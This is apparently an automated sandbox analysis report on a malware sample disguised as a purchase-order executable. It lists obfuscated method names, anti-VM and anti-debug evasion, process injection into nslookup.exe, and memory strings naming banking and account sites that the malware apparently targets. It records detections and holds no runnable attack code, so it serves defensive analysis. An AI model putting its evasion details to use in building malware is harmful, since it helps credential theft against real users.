        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, KfZZI5xi9gi0wyGNgg.csHigh entropy of concatenated method names: 'MnITiHVIVE', 'LvXTrWDL9R', 'SwEThhLKli', 'YblT4MaBJh', 'l9qTcRF4hx', 'm2kTRPpNDJ', 'lJx89bLSfdSh6Q4T6b', 'c9wEinkhQBn1u8f69Y', 'Jb8TT0E4x9', 'mA6T7MNFvS'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, FDnQ1GTSbdEiBe64ky8.csHigh entropy of concatenated method names: 'ioXb1182pg', 'JubbvNfJoE', 'OavbDwEwg3', 'l7Yby9LLBY', 'vunb6WkSiC', 'C5qbYH6se9', 'xSubqhLrqQ', 'oxHb5bMTYp', 'upDbmGNHCa', 'GiNbsF2GIk'
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, cMZvlL9lXfkaw37YrG.csHigh entropy of concatenated method names: 'tFrB2Ae0yg', 'WmSBQeL5cY', 'zdQBXMpD4M', 'rVOBL6qors', 'NXBBZEyw8E', 'UWLBiUlZ3X', 'PcCBrEiRp1', 'xcuBVrrO25', 'eFjBhi9Qpd', 'tumB4NOYoK'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, vIxLQ9MsCwcQkaGqIj.csHigh entropy of concatenated method names: 'OMZZEJXLV4', 'aBDZ1bCURr', 'QDdZDniLoL', 'DxTZybg979', 'BemZYq7PUy', 'wTvZqrenTv', 'NR8Zmu9oS5', 'ydMZs4I6hh', 'maGQwWceNvCk1MyCxW5', 'jJXS5EcBbT05Ws7ES3j'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, LX5jsnwAlxmk5irAo7.csHigh entropy of concatenated method names: 'r41o9oehfF', 'OC1oj4S8cB', 'uEPBSElF3M', 'i5PBTnFWEX', 'bH1oG0UFYu', 'Rjto3VhpBA', 's3JoJF6bXd', 'lIhouVhMOQ', 'hFio0L8yc7', 'BREoWJPoyp'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, X3E8c1Wi6jhLZirVls.csHigh entropy of concatenated method names: 'ToString', 'N9ERGhBfI6', 'lBXROr8hS9', 'XX5Re9M36c', 'xdmRMvPhxL', 'kQHRKSQ3BY', 'CIuRC05BDE', 'nbdRa7lYlP', 'IZNR8iqUZn', 'BRCRfpNxtr'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, jPJ3l2QK6gtApY0G9A.csHigh entropy of concatenated method names: 'Dispose', 'UkUTFDGZNe', 'XBbAOCGpxm', 'vPWAAMnhpO', 'pAMTjZvlLl', 'hfkTzaw37Y', 'ProcessDialogKey', 'kG6ASxIt3I', 'FPkATgyOMT', 'Y3eAArGeWP'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, AxIt3IFgPkgyOMTj3e.csHigh entropy of concatenated method names: 'yHaBgMuSZk', 'AbWBOtaKva', 'GATBeEmE31', 'dIgBMdqWGP', 'U3eBuP4AtM', 'tjWBK4dex3', 'Next', 'Next', 'Next', 'NextBytes'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, utOO9LJhS14kuWKB8b.csHigh entropy of concatenated method names: 'CG1k5Angt2', 'wuUkmPbdvi', 'Lnrkg0QL2j', 'H6AkOLoF1J', 'Mj4kMujyKx', 'VLekKdKb8r', 'tonkaMlEZI', 'zMVk80ZmUH', 'zUJkHiW4bt', 'rlhkG24wim'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, LBJhZvsXM9Poch9qRF.csHigh entropy of concatenated method names: 'xpcL6G2bgX', 'heiLqbWuMo', 'tRyXeltoFc', 'MwWXMm6yYT', 'UD9XKh097K', 'tSdXC63v6H', 'ofVXajxjNK', 'kCkX8uFcrK', 'weUXfJH0t6', 'Q7GXH9lqiR'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, laNNGDaa1A73ahvoq9.csHigh entropy of concatenated method names: 'Tngi2bujNT', 'UYyiX1pN4y', 'xlpiZPMgm2', 'Nd2Zj5TyLS', 'P83ZzaJVus', 'tWViSX6PED', 'hZDiThh6oo', 'q6jiApOBay', 'mXxi7skXll', 'Cw4ixGdjHq'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, IgDTacu5vQcOrwm4pA.csHigh entropy of concatenated method names: 'By5cHafBZn', 'BYWc3BU4Jp', 'hCmcuFlieL', 'k7dc0YNPnJ', 'FFucOVSpym', 'OsxceYfQDF', 'tG2cMVjPWl', 'zGtcK4pVe0', 'qVOcC2ih7K', 'HiDcaJNRj4'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, wHVIVE5avXWDL9RIrc.csHigh entropy of concatenated method names: 'jJ7QuofcSb', 'JElQ0bT2qn', 'XKdQWYEJjx', 'tlMQnvkSY0', 'hilQdyx0xe', 'Q5mQwdNfAZ', 'FPJQpWcqiZ', 'LJnQ9Ome36', 'zbBQFAsvSU', 'UPcQjOB6tQ'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.csHigh entropy of concatenated method names: 'x0j7tPfKNs', 'IZ37252hkO', 'p8x7QZuY2c', 'nbZ7XgilOd', 'XE57LByv20', 'eC77ZBF7QY', 'Q797iGCl3d', 'J8J7r1IMEJ', 'cik7VB9dUZ', 'ldS7hopjkh'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, kGeWP0jdqfW8t05Vsr.csHigh entropy of concatenated method names: 'FStbT9GNgj', 'RPhb71LGr7', 'CYjbxTSNbX', 'bIhb2oPFdX', 'i6NbQK1hrg', 'xrlbLIxekp', 'xxEbZyQnQN', 'vZwBp0HWVG', 'KsWB999MVK', 'UOGBFSO6O4'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, BJ8mg0mwEhLKlijblM.csHigh entropy of concatenated method names: 'CCJXyCqyWO', 'JZxXYqvk4L', 'Tl3X5Yecl3', 'A2hXmpabPd', 'jboXcQ7Qtd', 'PGgXRBp0fr', 'RXKXoJENXQ', 'XkjXBO08DQ', 'SnjXbHihhX', 'MHmXUrsUHf'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, Iyxd2hT7F3ceptmnRAC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'drdUuWJGuj', 'dXbU010c2F', 'mGjUWBGWIJ', 'riYUn4Igdo', 'Sf8UdsPiGp', 'nv0UwcTPEK', 'B4AUppYnf2'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, EfqCIiA0MeMcoJJOWE.csHigh entropy of concatenated method names: 'hsXD5tUFk', 'moyy5S3Op', 'k9OYeYW3m', 'sgTqp7oEM', 'mrYmWiXem', 'sVZs0bPMj', 'Js3y0EPUeOE376E1pa', 'yvFAAkj79OxgWmTodd', 'gXpBo7Kq7', 'AjkUVRCG2'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, RCafVKzvRZCyLPbNSs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'auTbkfeDes', 'IjUbcwHDOw', 'wkibReHduc', 'Mtiboe8j25', 'jc8bBIR3jR', 'rY1bbrfjEH', 'fApbUemK8c'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, nhx42kgPpNDJ8ldnY6.csHigh entropy of concatenated method names: 'GaAZtDeP5u', 'Qo7ZQmuUBI', 'ePBZLLNebC', 'A24Zi1jxST', 'q6mZrNDXO2', 'OAWLdTnkGR', 'Cp9LwrdoTO', 'PfpLpyWI5f', 'jTtL9hxZK3', 'snZLF8nDFb'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, iKlnrXfiLbCbH1pXku.csHigh entropy of concatenated method names: 'EJii1mSEXC', 'mnEivSCd35', 'sqkiDPiwC4', 'XRliySg4ia', 'uZyi6fqKBM', 'JJJiYUTC30', 'OjWiqKxHNW', 'I2Ii52LgIg', 'DntimFcKcU', 'kPtisiUIRT'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, Fi83WJCdaDIbw1hFZY.csHigh entropy of concatenated method names: 'bYmZW71mkX', 'WqyZnNReMA', 'hWGZd9PcVl', 'ToString', 'G37Zw6cFoS', 'hs5ZphOpXQ', 'ICjx2BcDxLgkTiCAhMu', 'M3G3QXcpbT03f4AVbQt'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, KfZZI5xi9gi0wyGNgg.csHigh entropy of concatenated method names: 'MnITiHVIVE', 'LvXTrWDL9R', 'SwEThhLKli', 'YblT4MaBJh', 'l9qTcRF4hx', 'm2kTRPpNDJ', 'lJx89bLSfdSh6Q4T6b', 'c9wEinkhQBn1u8f69Y', 'Jb8TT0E4x9', 'mA6T7MNFvS'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, FDnQ1GTSbdEiBe64ky8.csHigh entropy of concatenated method names: 'ioXb1182pg', 'JubbvNfJoE', 'OavbDwEwg3', 'l7Yby9LLBY', 'vunb6WkSiC', 'C5qbYH6se9', 'xSubqhLrqQ', 'oxHb5bMTYp', 'upDbmGNHCa', 'GiNbsF2GIk'
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, cMZvlL9lXfkaw37YrG.csHigh entropy of concatenated method names: 'tFrB2Ae0yg', 'WmSBQeL5cY', 'zdQBXMpD4M', 'rVOBL6qors', 'NXBBZEyw8E', 'UWLBiUlZ3X', 'PcCBrEiRp1', 'xcuBVrrO25', 'eFjBhi9Qpd', 'tumB4NOYoK'
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: Process Memory Space: Purchase Order_20240528.exe PID: 1764, type: MEMORYSTR
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: 47B0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: 8A80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: 74C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: 9A80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMemory allocated: AA80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E rdtsc 3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeWindow / User API: threadDelayed 9826Jump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeAPI coverage: 0.6 %
        Source: C:\Windows\SysWOW64\nslookup.exeAPI coverage: 2.3 %
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe TID: 4032Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816Thread sleep count: 147 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816Thread sleep time: -294000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816Thread sleep count: 9826 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exe TID: 1816Thread sleep time: -19652000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664Thread sleep time: -75000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664Thread sleep count: 39 > 30Jump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664Thread sleep time: -58500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664Thread sleep count: 41 > 30Jump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe TID: 2664Thread sleep time: -41000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\nslookup.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A6BD30 FindFirstFileW,FindNextFileW,FindClose,5_2_02A6BD30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: 7--93mK-.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
        Source: 7--93mK-.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
        Source: 7--93mK-.5.drBinary or memory string: discord.comVMware20,11696487552f
        Source: 7--93mK-.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552#
        Source: 7--93mK-.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
        Source: 7--93mK-.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: global block list test formVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20,11696487552t
        Source: 7--93mK-.5.drBinary or memory string: AMC password management pageVMware20,11696487552
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: 7--93mK-.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
        Source: 7--93mK-.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
        Source: 7--93mK-.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
        Source: 7--93mK-.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
        Source: 7--93mK-.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
        Source: 7--93mK-.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.intuit.comVMware20,11696487552t
        Source: 7--93mK-.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
        Source: 7--93mK-.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
        Source: 7--93mK-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
        Source: 7--93mK-.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
        Source: 7--93mK-.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,1_
        Source: 7--93mK-.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
        Source: 7--93mK-.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
        Source: 7--93mK-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
        Source: 7--93mK-.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tportal.hdfcbank.comVMware20,11696487552
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4538062090.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
        Source: 7--93mK-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
        Source: 7--93mK-.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
        Source: firefox.exe, 00000009.00000002.2514682215.000001F10F10F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHH
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E rdtsc 3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622B60 NtClose,LdrInitializeThunk,3_2_01622B60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6154 mov eax, dword ptr fs:[00000030h]3_2_015E6154
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6154 mov eax, dword ptr fs:[00000030h]3_2_015E6154
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DC156 mov eax, dword ptr fs:[00000030h]3_2_015DC156
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4164 mov eax, dword ptr fs:[00000030h]3_2_016B4164
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4164 mov eax, dword ptr fs:[00000030h]3_2_016B4164
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01674144 mov eax, dword ptr fs:[00000030h]3_2_01674144
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01674144 mov eax, dword ptr fs:[00000030h]3_2_01674144
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01674144 mov ecx, dword ptr fs:[00000030h]3_2_01674144
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01674144 mov eax, dword ptr fs:[00000030h]3_2_01674144
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01674144 mov eax, dword ptr fs:[00000030h]3_2_01674144
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01678158 mov eax, dword ptr fs:[00000030h]3_2_01678158
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01610124 mov eax, dword ptr fs:[00000030h]3_2_01610124
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov eax, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov ecx, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov eax, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov eax, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov ecx, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov eax, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov eax, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov ecx, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov eax, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E10E mov ecx, dword ptr fs:[00000030h]3_2_0168E10E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168A118 mov ecx, dword ptr fs:[00000030h]3_2_0168A118
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168A118 mov eax, dword ptr fs:[00000030h]3_2_0168A118
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168A118 mov eax, dword ptr fs:[00000030h]3_2_0168A118
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168A118 mov eax, dword ptr fs:[00000030h]3_2_0168A118
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A0115 mov eax, dword ptr fs:[00000030h]3_2_016A0115
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B61E5 mov eax, dword ptr fs:[00000030h]3_2_016B61E5
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016101F8 mov eax, dword ptr fs:[00000030h]3_2_016101F8
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A61C3 mov eax, dword ptr fs:[00000030h]3_2_016A61C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A61C3 mov eax, dword ptr fs:[00000030h]3_2_016A61C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E1D0 mov eax, dword ptr fs:[00000030h]3_2_0165E1D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E1D0 mov eax, dword ptr fs:[00000030h]3_2_0165E1D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0165E1D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E1D0 mov eax, dword ptr fs:[00000030h]3_2_0165E1D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E1D0 mov eax, dword ptr fs:[00000030h]3_2_0165E1D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DA197 mov eax, dword ptr fs:[00000030h]3_2_015DA197
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DA197 mov eax, dword ptr fs:[00000030h]3_2_015DA197
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DA197 mov eax, dword ptr fs:[00000030h]3_2_015DA197
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169C188 mov eax, dword ptr fs:[00000030h]3_2_0169C188
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169C188 mov eax, dword ptr fs:[00000030h]3_2_0169C188
